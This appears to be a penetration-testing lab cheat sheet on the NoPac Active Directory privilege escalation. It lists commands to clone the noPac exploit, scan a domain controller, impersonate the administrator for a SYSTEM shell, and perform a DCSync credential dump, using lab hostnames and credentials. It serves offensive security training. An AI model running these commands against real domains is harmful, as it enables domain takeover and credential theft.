NoPac

NoPac is a privilege escalation vulnerability affecting Active Directory environments, allowing attackers to impersonate privileged accounts and execute malicious actions.

1. Clone NoPac Exploit Repository

Command:

sudo git clone https://github.com/Ridter/noPac.git
  • Description: Used to clone the NoPac exploit repository using Git. Performed from a Linux-based host.


2. Scan for NoPac Vulnerability

Command:

sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
  • Description: Runs scanner.py to check if a target system is vulnerable to NoPac/Sam_The_Admin from a Linux-based host.


3. Exploit NoPac to Gain SYSTEM Shell

Command:

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --shell --impersonate administrator -use-ldap
  • Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (--shell). Performed from a Linux-based host.


4. Exploit NoPac for DCSync Attack

Command:

sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump --just-dc-user INLANEFREIGHT/administrator
  • Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.

Last updated